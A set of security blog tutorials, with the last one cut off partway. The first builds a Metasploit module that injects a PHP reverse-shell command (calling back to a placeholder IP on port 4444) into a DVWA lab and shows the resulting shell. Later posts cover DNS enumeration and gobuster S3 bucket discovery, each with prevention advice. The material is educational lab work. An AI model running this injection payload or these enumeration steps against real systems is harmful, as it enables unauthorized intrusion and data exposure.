msf6 > search artigo

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  auxiliary/artigo/command_injection                   excellent  No     Criando um script simples que fará uma requisição externa via http


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/artigo/command_injection

msf6 >

Iremos selecionar o nosso script para identificar as configurações necessários como parâmetro para sua execução.


msf6 > use auxiliary/artigo/command_injection
msf6 auxiliary(artigo/command_injection) > show options

Module options (auxiliary/artigo/command_injection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       Solicitacao de URL para site, por exemplo: google.com.br
   RMETHOD  GET              yes       PUT or DELETE
   RPATH                     yes       Caminho para a solicitacao de envio do URL, por exemplo: /login
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections


View the full module info with the info, or info -d command.

Inserindo configurações para sua execução, segue abaixo:


msf6 auxiliary(artigo/command_injection) > set RHOST google.com
RHOST => google.com
msf6 auxiliary(artigo/command_injection) > set RPORT 443
RPORT => 443
msf6 auxiliary(artigo/command_injection) > set SSL true
SSL => true
msf6 auxiliary(artigo/command_injection) > set RPATH /
RPATH => /
msf6 auxiliary(artigo/command_injection) > show options

Module options (auxiliary/artigo/command_injection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    google.com       yes       Solicitacao de URL para site, por exemplo: google.com.br
   RMETHOD  GET              yes       PUT or DELETE
   RPATH    /                yes       Caminho para a solicitacao de envio do URL, por exemplo: /login
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections


View the full module info with the info, or info -d command.

Executando o exploit, segue abaixo:


msf6 auxiliary(artigo/command_injection) > exploit

[+]  Send request google.com/
[+]  Response status code:  301
[*] Auxiliary module execution completed

Com poucas linhas fomos no google via https e o mesmo nos retonou um status 301 informando o seu redirecionamento.

Script simples que não faz muita coisa né ?

Agora imagina que encontramos uma falha de command injection via http em uma aplicação e seria necessário injectar esse comando nessa aplicação ter acesso de um shell reverse, nesse caso iremos aprimorar o nosso script realizando a tal chamada e abriremos um terminal com o nc para receber esse acesso.

Para essa finalidade, faremos uso de uma aplicação contida em um ambiente Docker para investigar essa vulnerabilidade, criando assim um ambiente de laboratório.

Damn Vulnerable Web Application (DWVA)

DVWA, que significa "Damn Vulnerable Web Application", é uma aplicação web de código aberto projetada para ser propositalmente vulnerável. O DVWA é usado para fins educacionais e de treinamento em segurança cibernética. Ele oferece um ambiente controlado no qual os profissionais de segurança, estudantes e entusiastas podem praticar e aprimorar suas habilidades em testes de penetração e descoberta de vulnerabilidades web.

Principais características do DVWA:

Vulnerabilidades Intencionais: O DVWA possui uma variedade de vulnerabilidades web propositais incorporadas, como injeção SQL, cross-site scripting (XSS), cross-site request forgery (CSRF), execução remota de código (RCE), entre outras.
Níveis de Segurança Ajustáveis: A aplicação permite ajustar o nível de segurança, o que afeta a dificuldade de explorar as vulnerabilidades. Isso é útil para os usuários ajustarem o ambiente de acordo com seu nível de habilidade e experiência.
Ambiente de Treinamento Seguro: O DVWA é destinado a ser usado em um ambiente controlado, como uma máquina virtual local ou um ambiente de laboratório de treinamento. Ele não deve ser implantado em um ambiente de produção, pois possui vulnerabilidades deliberadas.
Facilidade de Configuração: A instalação e configuração do DVWA são relativamente simples, tornando-o acessível para iniciantes no campo da segurança cibernética.

Executando via docker, segue o comando abaixo:

docker run --rm -it -p 8080:80 vulnerables/web-dvwa

Exploração

Vamos acessar o DVWA em execução na porta 8080 e explorar uma vulnerabilidade conhecida como command injection.

O que é command injection ?

A injeção de comando (Command Injection) é uma vulnerabilidade de segurança que ocorre quando um aplicativo aceita entradas não confiáveis (como dados do usuário) e as utiliza como parte de um comando que será executado pelo sistema operacional. Isso pode ocorrer em sistemas nos quais os comandos do sistema operacional podem ser incorporados diretamente em uma chamada de função ou em um processo do aplicativo.

Segue abaixo a tela do DVWA no menu de Command injection:

Com fundamentação nesse campo, pretendemos injetar um comando para shell reverso, com o objetivo de acessar a máquina por meio de uma entrada não tratada. Abaixo, encontra-se o script atualizado para o msfconsole.


class MetasploitModule < Msf::Auxiliary
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Criar exemplo de requisição http simples para o Metasploit',
      'Description' => %q{
        A intenção deste módulo é entender como o Metasploit funciona e o que podemos desenvolver dentro dele.
      },
      'Author'      => [ 'Higor Diego' ],
      'License'     => BSD_LICENSE))

      register_options(
        [
          OptString.new('RHOST',  [true, 'URL para a requisição ao site, por exemplo: google.com.br']),
          OptString.new('RPATH',  [true, 'Caminho para a URL para enviar a requisição, por exemplo: /login ']),
          OptString.new('RMETHOD', [true, "PUT ou DELETE", "GET"]),
          OptString.new('RCOOKIE', [true, "Sessão de Cookie"])
        ]
      )
      deregister_options('RHOSTS')
      deregister_options('VHOST')
    end

  def run
    begin
      path = datastore['RPATH']
      method = datastore['RMETHOD']
      host = datastore['RHOST']
      cookie = datastore['RCOOKIE']

      res = send_request_cgi(
        {
          'uri'    => "#{normalize_uri(path)}",

          'method' => method,
          'cookie' => "Cookie: language=en; cookieconsent_status=dismiss; continueCode=8lwZqVyJnO4gKPNM6DA6Bh9toCVHjfD2TnaSXgULxA1b5ermaLRzpvQx3BWE; PHPSESSID=#{cookie}; security=low",
          'vars_post' => {
            'ip': '127.0.0.1 && php -r \'$sock=fsockopen("meu_ip_aqui",4444);exec("bash <&3 >&3 2>&3");\'',
            'Submit' => 'Submit',
          },
          'headers' => {
            'Content-Type': 'application/x-www-form-urlencoded',
            'Referer': 'http://localhost:8080/vulnerabilities/exec/',
          },
          'ctype'       => 'application/x-www-form-urlencoded'
        },
        20
      )

      print_good(" Enviar requisição para #{host}#{normalize_uri(path)}" )
      print_good(" Código de status da resposta:  #{res.code}")
    rescue ::Exception => e
      return nil
    end
  end

end

Depois de atualizarmos o código, ajustamos as variáveis necessárias para a submissão da solicitação, e suas opções serão configuradas da seguinte forma:

msf6 auxiliary(artigo/command_injection) > show options

Module options (auxiliary/artigo/command_injection):

   Name     Current Setting             Required  Description
   ----     ---------------             --------  -----------
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RCOOKIE  s41u5eodfcav729jlsnsu1t5u5  yes       Sessão de Cookie
   RHOST    127.0.0.1                   yes       URL para a requisição ao site, por exemplo: google.com.br
   RMETHOD  POST                        yes       PUT ou DELETE
   RPATH    /vulnerabilities/exec/      yes       Caminho para a URL para enviar a requisição, por exemplo: /login
   RPORT    8080                        yes       The target port (TCP)
   SSL      false                       no        Negotiate SSL/TLS for outgoing connections


View the full module info with the info, or info -d command.

Em outro terminal iremos utilizar o seguinte comando:

┌──(higordiego㉿higordiego)-[~]
└─$ nc -lvnp 4444

Ao acionar o exploit que foi criado, utilize o seguinte comando:

msf6 auxiliary(artigo/command_injection) > exploit

[+]  Enviar requisição para 127.0.0.1/vulnerabilities/exec/
[*] Auxiliary module execution completed

No nc temos o seguinte o resultado:


┌──(higordiego㉿higordiego)-[~]
└─$ nc -lvnp 4444            
listening on [any] 4444 ...
connect to [192.168.0.13] from (UNKNOWN) [172.17.0.3] 39752

Dessa forma, conseguimos obter acesso e operar o servidor por meio de alguns comandos de shell, tais como:


┌──(higordiego㉿higordiego)-[~]
└─$ nc -lvnp 4444            
listening on [any] 4444 ...
connect to [192.168.0.13] from (UNKNOWN) [172.17.0.3] 39752
ls -lah
total 20K
drwxr-xr-x 1 www-data www-data 4.0K Oct 12  2018 .
drwxr-xr-x 1 www-data www-data 4.0K Oct 12  2018 ..
drwxr-xr-x 1 www-data www-data 4.0K Oct 12  2018 help
-rw-r--r-- 1 www-data www-data 1.8K Oct 12  2018 index.php
drwxr-xr-x 1 www-data www-data 4.0K Oct 12  2018 source

Proteção Command Injection

Proteger contra injeção de comandos (Command Injection) envolve práticas seguras de programação e a implementação de medidas de segurança adequadas. Aqui estão algumas diretrizes gerais que podem ajudar a prevenir vulnerabilidades de injeção de comandos:

Validação e Filtragem de Entradas: Valide e filtre rigorosamente todas as entradas do usuário antes de incorporá-las em comandos do sistema ou em consultas de banco de dados. Utilize listas de permissões (whitelists) para permitir apenas caracteres ou padrões específicos nas entradas.
Escape de Caracteres Especiais: Ao incorporar entradas do usuário em comandos, utilize funções ou métodos que escapem caracteres especiais para que eles sejam tratados literalmente, não como parte do comando.
Utilize Parâmetros Seguros: Sempre que possível, utilize parâmetros de consulta ou placeholders ao construir consultas SQL ou comandos do sistema. Isso impede a interpolação direta de dados do usuário nos comandos.
Princípio do Menor Privilégio: Configure processos e aplicativos para terem apenas os privilégios necessários para realizar suas tarefas. Evite executar comandos com privilégios elevados quando não for estritamente necessário.

Conclusão

Este artigo explorou o universo ético do Metasploit, destacando a importância de utilizar suas ferramentas de maneira responsável e legal, com permissão explícita.

Abordamos o Metasploit como uma ferramenta valiosa para profissionais de segurança, exemplificando sua aplicação ética através do desenvolvimento de um módulo específico para explorar vulnerabilidades na Damn Vulnerable Web Application (DVWA).

Referência

https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
https://github.com/digininja/DVWA

Enumeração de DNS

Higor Diego — Sun, 05 Nov 2023 23:23:36 +0000

Imagine a internet como uma vasta rede de estradas e caminhos que conectam bilhões de dispositivos em todo o mundo. Para navegar nessa rede, usamos nomes de domínio em vez de números complexos de IP. O Sistema de Nomes de Domínio (DNS) é o mecanismo por trás dessa mágica, traduzindo nomes de domínio em endereços IP. Neste artigo, vamos mergulhar no emocionante mundo do DNS e, em seguida, explorar um tópico importante: A enumeração de DNS.

Desvendando o DNS

O DNS, ou Sistema de Nomes de Domínio, é o alicerce invisível da internet. Ele desempenha um papel crucial ao traduzir nomes de domínio, como www.exemplo.com, em endereços IP, permitindo que nossos dispositivos se comuniquem na web. Em vez de se preocupar com números IP complexos, nós usamos nomes de domínio amigáveis. O DNS é uma rede global de servidores que realiza essa tradução e é essencial para a navegação na web.

O DNS é organizado em várias camadas, e aqui estão as principais:

Raiz (Root)

A raiz do DNS é o nível mais alto da hierarquia e contém os servidores raiz, representados por letras, como A, B, C, e assim por diante. Esses servidores são a primeira parada na resolução de nomes de domínio.

Domínios de Topo (TLDs)

Logo abaixo da raiz estão os Domínios de Topo (TLDs), que incluem TLDs genéricos, como .com, .org, .net, e TLDs de código de país, como .br para o Brasil ou .fr para a França. Cada TLD é controlado por uma organização ou governo.

Domínio de Segundo Nível (SLD)

O SLD é a parte do nome de domínio imediatamente à esquerda do TLD. Por exemplo, em "exemplo.com", "exemplo" é o SLD.

Subdomínios

Os subdomínios são ramificações dos domínios de segundo nível e podem ser usados para organizar e hierarquizar a estrutura de um site. Por exemplo, em "blog.exemplo.com", "blog" é um subdomínio de "exemplo.com".

Registros DNS

Cada nome de domínio pode conter vários tipos de registros DNS, que armazenam informações específicas, como registros A (para mapear nomes de domínio a endereços IP), registros MX (para direcionar o tráfego de e-mail), registros CNAME (para criar aliases), e outros.

O Poder da Enumeração de DNS

A enumeração de DNS é uma prática vital no mundo da segurança cibernética e no reconhecimento de alvos. Em termos simples, ela envolve a detecção e listagem de todos os registros DNS possíveis associados a um nome de domínio. Isso inclui informações como nomes de host, tipos de registros DNS, TTLs (Tempo de Vida), endereços IP e muito mais, dependendo do nível de detalhe desejado.

Uma enumeração DNS eficaz pode ser usada para clonar zonas DNS manualmente, automatizadamente através de scripts, ou para explorar vulnerabilidades de transferência de zona DNS, conhecidas como transferência AXFR (transferência assíncrona de faixa completa). Essa transferência de DNS ocorre quando um servidor DNS mal configurado responde a solicitações AXFR, o que pode ser uma porta de entrada para invasores.

O Impacto da Enumeração DNS

Após a conclusão da enumeração de DNS, indivíduos não autorizados podem usar as informações obtidas para acessar registros internos de uma rede, fornecendo uma visão detalhada do mapa DNS. Isso pode ser explorado para examinar a superfície de ataque de uma empresa, coletar dados e, potencialmente, identificar vulnerabilidades.

Em artigos anteriores, abordamos a enumeração de subdomínios. Neste artigo, levaremos as coisas um passo adiante e exploraremos como realizar uma enumeração DNS completa.

Banner Grabbing

No contexto do DNS, "banner" se refere a informações de identificação ou versão do software que um servidor DNS está executando. No entanto, o DNS não possui um banner tradicional como outros serviços de rede. Em vez disso, para obter informações sobre a versão do software de um servidor DNS, pode-se realizar uma consulta especial conhecida como "version.bind. CHAOS TXT". Essa consulta é uma maneira de descobrir informações sobre o servidor BIND, que é um dos softwares de servidor DNS mais populares. O BIND responde a essa consulta com informações sobre a versão que está sendo executada.

Para realizar essa consulta, você pode usar a ferramenta "dig", que é uma ferramenta de linha de comando usada para consultar informações do DNS. Aqui está um exemplo de como você pode usar o "dig" para obter informações de versão de um servidor BIND:



dig version.bind CHAOS TXT @<endereço_IP_do_servidor_DNS>

Essas informações de versão podem ser úteis para os administradores de sistemas que desejam manter seus servidores atualizados e seguros.

Host

O "host" é uma ferramenta usada para resolver o endereço IP associado a um nome de domínio específico. Esse comando é amplamente utilizado em sistemas Unix e Linux para consultar servidores DNS e obter informações sobre um determinado domínio. Você pode usá-lo da seguinte maneira:



host example.com.br

O comando "host" recupera registros A, AAAA e MX por padrão. Se quiser especificar qualquer tipo específico de registro DNS, você pode usar a opção -t.

Transferência de Zona

A transferência de zona é uma operação que permite a replicação de todas as informações de DNS de uma zona (domínio) de um servidor DNS principal para um servidor DNS secundário. Isso é feito para manter os servidores DNS secundários atualizados com as informações mais recentes da zona, garantindo redundância e disponibilidade.

Para realizar a enumeração de DNS, existem várias ferramentas à disposição, incluindo:

Nmap: Uma ferramenta versátil usada para escanear redes e identificar dispositivos, portas abertas e serviços em execução. Pode ser usado para explorar informações de DNS.
DNSRecon: Uma ferramenta de código aberto para coleta de informações relacionadas a servidores DNS e registros DNS em uma rede.
Sublist3r: Uma ferramenta de código aberto para a enumeração de subdomínios em um domínio específico.

DNSenum

O DNSenum é uma ferramenta poderosa para o reconhecimento de DNS. Ele permite que você crie um mapa completo de DNS para qualquer nome de domínio na Internet. Você pode usá-lo para obter registros NS, MX, AXFR e A, bem como a versão remota do BIND do servidor DNS.

Aqui está um exemplo de como usar o DNSenum:



dnsenum -d example.com.br

Nmap

O Nmap (Network Mapper) é uma ferramenta de código aberto amplamente usada para escanear e mapear redes, identificando dispositivos, portas abertas e serviços em execução. Ele também pode ser usado para explorar informações de DNS. Um exemplo de comando é:



nmap -n --script "(default and dns) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" <IP>

DNS Recon

O DNS Recon é outra ferramenta de código aberto que ajuda na coleta de informações relacionadas a servidores DNS e registros DNS em uma rede. É amplamente utilizado por profissionais de segurança cibernética e administradores de sistemas para identificar informações sobre domínios, subdomínios e configurações de servidores DNS. Aqui está um exemplo de uso:



dnsrecon -d scanme.nmap.org

Enumeração de Subdomínio

Subdomínios são partes de um domínio de nível superior que funcionam como subdivisões desse domínio principal. Eles são usados para organizar e hierarquizar a estrutura de um site ou rede, permitindo que diferentes seções ou serviços sejam acessados através de endereços específicos.

O "Sublist3r" é uma ferramenta de código aberto projetada para a enumeração de subdomínios. Ela automatiza o processo de busca de subdomínios, consultando servidores DNS, motores de busca e outros recursos da internet. Isso é valioso para avaliar a superfície de ataque de um domínio e identificar possíveis pontos de entrada para ataques.



sublist3r -d example.com.br

Como Prevenir a Enumeração de DNS

Embora seja impossível garantir proteção total contra a enumeração de DNS, quando o sistema DNS é público e acessível a qualquer pessoa, é possível adotar algumas práticas que ajudarão a mitigar potenciais riscos. Essas precauções incluem:

Desativar a possibilidade de transferências de zona DNS por hosts não confiáveis.
Assegurar que não haja direcionamento de hosts privados para endereços IP públicos.
Realizar auditorias regulares dos registros DNS para identificar e remover registros obsoletos e não utilizados.
Evitar o uso de registros DNS para subdomínios de desenvolvimento e teste, optando por incluí-los no arquivo /etc/hosts.

Conclusão

A enumeração de DNS é uma parte fundamental da segurança cibernética e do reconhecimento de alvos. Ela permite que profissionais de segurança e administradores de sistemas entendam a paisagem de DNS e identifiquem possíveis vulnerabilidades. No entanto, é essencial realizar essa atividade de forma ética e em conformidade com as políticas de segurança. Conhecer as ferramentas e técnicas disponíveis pode ajudar a proteger as redes e sistemas contra potenciais ameaças. Portanto, explore essas ferramentas com responsabilidade e conhecimento.

Referência

https://www.kali.org/tools/sublist3r/
https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6
https://securitytrails.com/blog/subdomain-scanner-find-subdomains?__cf_chl_tk=fTLXBnH_nrNkaDsas5NMLoicY74_H5BCfUpmnnoBLXA-1699222164-0-gaNycGzNDns
https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns

Discover how to find hidden buckets in Amazon S3 Cloud.

Higor Diego — Sun, 05 Nov 2023 14:33:01 +0000

Today we will discuss something that’s pure excitement: finding hidden directories in Amazon’s famous S3 buckets.

But, before we dive deep into this subject, an important note: we do everything here in an educational manner, okay? If you mess up and things go south, it’s not on me. Always ask for permission before scanning, brute-forcing, or exploring someone else’s systems. Got it? 😉

Amazon S3

Amazon S3 is a highly scalable and durable object storage service offered by Amazon Web Services (AWS). It’s designed to store, manage, and retrieve large amounts of data reliably and securely in the cloud. S3 is widely used by companies of all sizes to store a variety of data types, such as files, images, videos, and backups, making it a popular choice for cloud storage solutions. Its scalability, high availability, and security make it an essential tool for various applications, from hosting websites to data analysis and critical information backup.

S3 Security Settings and Risks

Amazon S3 is an incredibly versatile platform, serving a wide range of needs, from storing backups and website data to running Big Data analytics and file management. However, when dealing with such a vast and diverse volume of data in one place, legitimate security concerns arise.

So, what are these security concerns, and what security settings can an administrator implement to properly protect a “bucket” and its files in Amazon S3?

First and foremost, it’s crucial to understand that Amazon S3 is considered a “publicly accessible platform.” This means that, with the appropriate URL and permissions, any “bucket” can be accessed from anywhere through HTTP requests, similar to what a web browser does to access a common website.

The accessibility of a “bucket” via its URL depends on the enabled security measures. However, it’s important to highlight that Amazon S3 is not a hidden resource available only after passing through multiple layers of authentication. On the contrary, it’s a resource that can be accessed through AWS endpoints from anywhere on the web, representing the primary security risk. Any S3 “bucket” and its associated data have the potential to be accessible.

Regarding Amazon S3 security, the checks implemented by the service to authorize access to an S3 resource, whether a “bucket” or an object, are robust. S3 evaluates permissions at the user level, through “bucket” policies, “bucket” access control lists (ACLs), and object ACLs. These security layers are essential to ensure that only authorized users can access and manipulate the data stored in S3.

How to Find Open Amazon S3 Buckets

In recent years, we have witnessed alarming data leaks in large companies due to the exposure of “buckets” on Amazon S3. If you want to check a list of the most notorious leaks, you can find it here. Through these security flaws, a wide range of confidential information was inadvertently made accessible to the public. We’re talking about Social Security numbers, personal photos, sales records, usernames and passwords, medical histories, and credit reports, among other things.

S3 Bucket Search Tools

If you’re interested in exploring publicly available “buckets” in Amazon S3, you need to use a tool that performs tests to check the existence of these “buckets.” When a “bucket” name does not exist, the service returns an error code called “NoSuchBucket.” Fortunately, there are several tools available for this purpose.

Initially, some of the early S3 “bucket” search tools included options like Bucket Lazy S3, bucket_finder, AWS Cred Scanner, sandcastle, Mass3, Dumpster Diver, S3 Bucket Finder, gobuster, and S3Scanner. These tools played a significant role in checking keywords in the names of publicly accessible “buckets,” although they had some limitations. The results often included irrelevant “buckets” and displayed only the first thousand files from their content.

What is Gobuster

Developed in the Go language, Gobuster is a high-performance scanner that proves to be a valuable tool for finding hidden directories, URLs, subdomains, and S3 buckets.

The question that often arises is, “What about Ffuf?” Although Ffuf is a notable web fuzzer, Gobuster emerges as an even faster and more versatile alternative. Additionally, Gobuster offers support for extensions that expand its capabilities, which is a differentiator. The program can also scale its operations using multiple threads and perform parallel scans to speed up results.

Now, as for installing Gobuster, the process is quite simple. If you’re using Kali Linux or Parrot OS, Gobuster is pre-installed for you.

On the other hand, if you’re using Ubuntu or a Debian-based system, you can easily install Gobuster using apt:

Linux



apt install gobuster

MacOs



brew install gobuster

After the installation is complete, you’ll need a wordlist. This list can include passwords, usernames, subdomains, and so on. There are various sources where you can obtain useful word lists.

My recommendation is to use Seclists. Seclists is a comprehensive repository of various lists used in security assessments. This includes collections of usernames, passwords, URLs, and more. If you’re using Kali Linux, you can find Seclists in the /usr/share/wordlists directory.

To try Gobuster in real-time, you have the option to use your own website as a target or, conveniently, employ a web application called Damn Vulnerable Web Application (DVWA). DVWA is a deliberately misconfigured web application created to be intentionally vulnerable. It’s a tool often used by penetration testing professionals to practice and improve their web application attack skills.

DNS Module

DNS, which stands for Domain Name System, is a cornerstone of the Internet that translates user-friendly domain names into IP addresses used by computers to identify resources on the network. It acts as a kind of “phone book” for the Internet, allowing browsers and applications to locate servers and websites corresponding to the domain names entered by users. DNS plays a crucial role in facilitating web navigation and online communication.

The DNS mode is used to discover hidden subdomains within a target domain. For example, if you have a domain called mydomain.com, you can use Gobuster to find subdomains like admin.mydomain.com, support.mydomain.com, and so on.

Here’s the Gobuster command for DNS enumeration:



┌──(higordiego㉿host)-[~]
└─$ gobuster dns -h
Uses DNS subdomain enumeration mode

Usage:
  gobuster dns [flags]

Flags:
  -d, --domain string      The target domain
  -h, --help               help for dns
      --no-fqdn            Do not automatically add a trailing dot to the domain, so the resolver uses the DNS search domain
  -r, --resolver string    Use custom DNS server (format server.com or server.com:port)
  -c, --show-cname         Show CNAME records (cannot be used with '-i' option)
  -i, --show-ips           Show IP addresses
      --timeout duration   DNS resolver timeout (default 1s)
      --wildcard           Force continued operation when wildcard found

Global Flags:
      --debug                 Enable debug output
      --delay duration        Time each thread waits between requests (e.g. 1500ms)
      --no-color              Disable color output
      --no-error              Don't display errors
  -z, --no-progress           Don't display progress
  -o, --output string         Output file to write results to (defaults to stdout)
  -p, --pattern string        File containing replacement patterns
  -q, --quiet                 Don't print the banner and other noise
  -t, --threads int           Number of concurrent threads (default 10)
  -v, --verbose               Verbose output (errors)
  -w, --wordlist string       Path to the wordlist. Set to - to use STDIN.
      --wordlist-offset int   Resume from a given position in the wordlist (defau

We will perform a DNS enumeration. You can execute it with the following command:



┌──(higordiego㉿host)-[~]
└─$ gobuster dns -d test.io -w /usr/share/wordlists/dirb/common.txt 

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     test.io
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/wordlists/dirb/common.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found: api.test.io

Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

AWS S3 Module

Amazon S3 is widely adopted by a large number of companies for distributing content, ranging from public material like website images to private and confidential files.

Now, let’s explore the help command to identify the various parameters offered by Gobuster in its S3 mode:



┌──(higordiego㉿host)-[~]
└─$ gobuster s3 -h                                                                                           
Uses aws bucket enumeration mode

Usage:
  gobuster s3 [flags]

Flags:
      --client-cert-p12 string            a p12 file to use for options TLS client certificates
      --client-cert-p12-password string   the password to the p12 file
      --client-cert-pem string            public key in PEM format for optional TLS client certificates
      --client-cert-pem-key string        private key in PEM format for optional TLS client certificates (this key needs to have no password)
  -h, --help                              help for s3
  -m, --maxfiles int                      max files to list when listing buckets (only shown in verbose mode) (default 5)
  -k, --no-tls-validation                 Skip TLS certificate verification
      --proxy string                      Proxy to use for requests [http(s)://host:port] or [socks5://host:port]
      --random-agent                      Use a random User-Agent string
      --retry                             Should retry on request timeout
      --retry-attempts int                Times to retry on request timeout (default 3)
      --timeout duration                  HTTP Timeout (default 10s)
  -a, --useragent string                  Set the User-Agent string (default "gobuster/3.6")

Global Flags:
      --debug                 Enable debug output
      --delay duration        Time each thread waits between requests (e.g. 1500ms)
      --no-color              Disable color output
      --no-error              Don't display errors
  -z, --no-progress           Don't display progress
  -o, --output string         Output file to write results to (defaults to stdout)
  -p, --pattern string        File containing replacement patterns
  -q, --quiet                 Don't print the banner and other noise
  -t, --threads int           Number of concurrent threads (default 10)
  -v, --verbose               Verbose output (errors)
  -w, --wordlist string       Path to the wordlist. Set to - to use STDIN.
      --wordlist-offset int   Resume from a given position in the wordlist (defaults to 0)

We will create a file named ‘bucket_list.txt’ and add a list of names that can be used as bucket names in Amazon S3. After creating the file, we will proceed with the following command:



┌──(higordiego㉿host)-[~]

└─$ gobuster s3 -w bucket_list.txt 

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Threads:                 10

[+] Wordlist:                bucket_list.txt

[+] User Agent:              gobuster/3.6

[+] Timeout:                 10s

[+] Maximum files to list:   5

===============================================================

Starting gobuster in S3 bucket enumeration mode

===============================================================

[ERROR] Get "https://dev.app.test.io.com.br.s3.amazonaws.com/?max-keys=5": tls: failed to verify certificate: x509: certificate is valid for .s3.amazonaws.com, s3.amazonaws.com, not dev.app.test.io.com.br.s3.amazonaws.com

[ERROR] Get "https://beta.test.io.com.br.s3.amazonaws.com/?max-keys=5": tls: failed to verify certificate: x509: certificate is valid for .s3.amazonaws.com, s3.amazonaws.com, not beta.test.io.com.br.s3.amazonaws.com

[ERROR] Get "https://echo.test.io.s3.amazonaws.com/?max-keys=5": tls: failed to verify certificate: x509: certificate is valid for .s3.amazonaws.com, s3.amazonaws.com, not echo.test.io.s3.amazonaws.com

[ERROR] Get "https://test.io.com.br.s3.amazonaws.com/?max-keys=5": tls: failed to verify certificate: x509: certificate is valid for .s3.amazonaws.com, s3.amazonaws.com, not test.io.com.br.s3.amazonaws.com

[ERROR] Get "https://test.com.br.s3.amazonaws.com/?max-keys=5": tls: failed to verify certificate: x509: certificate is valid for .s3.amazonaws.com, s3.amazonaws.com, not test.com.br.s3.amazonaws.com

[ERROR] Get "https://app.test.io.com.br.s3.amazonaws.com/?max-keys=5": tls: failed to verify certificate: x509: certificate is valid for .s3.amazonaws.com, s3.amazonaws.com, not app.test.io.com.br.s3.amazonaws.com

http://prod_test.s3.amazonaws.com/

http://test-images.s3.amazonaws.com/

Progress: 8 / 9 (88.89%)

===============================================================

Finished

===============================================================

Directory Module

The directory scanning function in Gobuster plays a crucial role in searching for hidden files and URL paths. This encompasses a wide variety of resources, ranging from images and script files to virtually any type of file available on the Internet.

Here’s the command to use the dir module on the previously found DNS:



┌──(higordiego㉿host)-[~/Documentos/artigo-s3]

└─$ gobuster dir -w files_list.txt  -u http://test-images.s3.amazonaws.com/ 

===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                     http://test-images.s3.amazonaws.com/

[+] Method:                  GET

[+] Threads:                 10

[+] Wordlist:                files_list.txt

[+] Negative Status codes:   404

[+] Exclude Length:          243

[+] User Agent:              gobuster/3.6

[+] Timeout:                 10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

/image/b26086426c7e483b2924e775485b3215.jpg (Status: 200) [Size: 629968]

/image/contrato.jpg   (Status: 200) [Size: 2830252]

===============================================================

Finished

===============================================================

How to Prevent Gobuster Enumeration Attacks

If you are concerned about Amazon S3 security and want to prevent bucket enumeration, here are some measures you can take:

Access Control: Use strict access control policies and permissions in Amazon S3 to ensure that only authorized individuals can list, access, or modify resources. Monitor Activities: Implement activity monitoring in your Amazon S3 to detect unauthorized access attempts or bucket enumeration. Restrict Access by Referrer: Use conditional referencing to restrict bucket access based on the “Referer” header of the HTTP request. Block Directory Access: Configure directories within the bucket not to allow listing, making it harder to enumerate subdirectories. Protect Your Credentials: Keep your credentials secure and avoid sharing them improperly. Regular Audits: Conduct regular audits of your Amazon S3 configuration to ensure that your security measures are up to date and effective. Use Bot Protection Solutions: Bot protection services like Cloudflare will prevent any brute force attacks, making it incredibly difficult to attack your web application.
Conclusion

Remember that Amazon S3 security is crucial because unauthorized access to your buckets can lead to data leaks and other vulnerabilities.

Be sure to follow AWS’s best security practices to properly protect your resources in S3.

Referencies

https://medium.com/quiknapp/fuzz-faster-with-ffuf-c18c031fc480
https://medium.com/@janijay007/s3-bucket-misconfiguration-from-basics-to-pawn-6893776d1007
https://takahiro-oda.medium.com/project-perform-s3-bucket-enumeration-using-various-s3-bucket-enumeration-tools-f4f63923b28
https://medium.com/stealthsecurity/finding-hidden-directories-sub-domains-and-s3-buckets-using-gobuster-5c2e3c41ff96

Descubra como encontrar buckets ocultos na nuvem da Amazon S3! 👀🔍

Higor Diego — Sat, 28 Oct 2023 21:40:05 +0000

Hoje vamos falar sobre uma parada que é pura emoção: encontrar diretórios ocultos nos famosos S3 buckets da Amazon.

Mas, antes de irmos fundo nesse assunto, um aviso importante: aqui é tudo na base da educação, ok? Se você fizer lambança e der ruim, a responsa não é minha. Sempre peça permissão antes de sair fazendo varredura, força bruta ou exploração em sistemas alheios. Beleza? 😉

Amazon S3

O Amazon S3 é um serviço de armazenamento de objetos altamente escalável e durável oferecido pela Amazon Web Services (AWS). Ele foi projetado para armazenar, gerenciar e recuperar grandes quantidades de dados de forma confiável e segura na nuvem. O S3 é amplamente utilizado por empresas de todos os tamanhos para armazenar uma variedade de tipos de dados, como arquivos, imagens, vídeos e backups, tornando-o uma escolha popular para soluções de armazenamento na nuvem. Sua escalabilidade, alta disponibilidade e segurança o tornam uma ferramenta essencial para diversas aplicações, desde hospedagem de sites até análise de dados e backup de informações críticas.

Configurações e riscos de segurança S3

O Amazon S3 é uma plataforma incrivelmente versátil, atendendo a uma ampla gama de necessidades, desde o armazenamento de backups e dados de websites até a execução de análises de Big Data e o gerenciamento de arquivos. No entanto, ao lidar com um volume tão vasto e diversificado de dados em um único local, surgem preocupações legítimas sobre segurança.

Então, quais são essas preocupações de segurança e quais configurações de segurança um administrador pode implementar para proteger adequadamente um "bucket" e seus arquivos no Amazon S3?

